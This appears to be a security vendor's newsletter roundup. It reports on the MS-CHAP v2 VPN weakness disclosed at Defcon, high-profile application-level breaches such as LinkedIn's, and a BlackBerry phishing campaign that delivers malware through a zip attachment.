Introducing Checkmarx Software Composition Analysis (CxSCA)

What’s HOT in Application Security Vol#26

Microsoft vulnerable to VPN attack

Microsoft’s MS-CHAP v2 (Microsoft Challenge Handshake Authentication Protocol version 2) which is used to authenticate users in PPTP-based (Point-to-Point Tunneling Protocol) VPNs has been shown to be vulnerable to hacks according to reports from the recent Defcon conference.

The Defcon conference is a venue for both hackers and vendors alike. Defcon and other similar venues allow hackers to show off their latest exploits in exposing software vulnerabilities. Vendors also gain from such venues by understanding where and how hackers manage to exploit such software vulnerabilities.

Hackers at the conference exposed possible breaches that would allow hackers to steal passwords for some wireless or virtual private networks. The problem for Microsoft is that these vulnerabilities are now public knowledge to other would be hackers.
The fear is that Windows users may be vulnerable to ‘man-in-the-middle’ attacks where attackers could steal passwords and valuable information on from wireless VPNs or virtual private networks as a direct result of the conference disclosure.

Whilst Microsoft has acknowledged the problem and have recommended that IT administrators add PEAP (Protective Extensible Authentication Protocol) to secure to secure passwords for VPN sessions, as of yet Microsoft have not released a security update.
For more information please go to:

Eliminating application level breaches

The recent attacks of two company giants; LinkedIn and Yahoo and the subsequent stealing of password lists has only emphasized the obvious laps in application security. In the case of LinkedIn, An opt-in calendar feature in LinkedIn’s Android and iOS mobile apps was sending user data back to LinkedIn servers as plain text. Basically, the application was sending unencrypted calendar entries such as phone numbers and various passwords to LinkedIn servers without the users knowledge. A total of 6.5 million passwords were stolen from the world’s leading professional social networking site. Google, the US government and even NASA have also reportedly been recent hacking victims as well.

However, whilst most large companies are focusing their security efforts on network security, application security seems to be taking a back seat despite the huge number of applications now available. The LinkedIn breach as well as other recent high profile attacks have been executed on the application level. Today multiple applications each have their own security standards and languages. According to VG Sundar VP, Oracle India, ‘Organizations must secure the network at the application, endpoint, database and device levels’. Another benefit at looking into the application security level is that defining certain universal protocols and security standards may bring a certain ‘rigidity into the process of delivering IT’ says Kartik Shahani, Country Manager, India & SAARC, RSA

Blackberry smartphones become victim of another malware attack

For the second time this month, Blackberry smartphones which are generally not the target of hackers, has fallen victim to a new type of malware. Users receive an email with the subject line ‘Your Blackberry ID has been created’. The email prompts users to follow instructions in an attached file on how to utilize the full benefits of their new Blackberry ID.
The email’s text and links are actually fine as they have been copied from a legitimate email from RIM, the makers of the Blackberry mobile device. The problem lies with the attached file. The attached .zip file drops execution type files which modify the system registry and start malware programs on the systems next start-up.

Jump to Category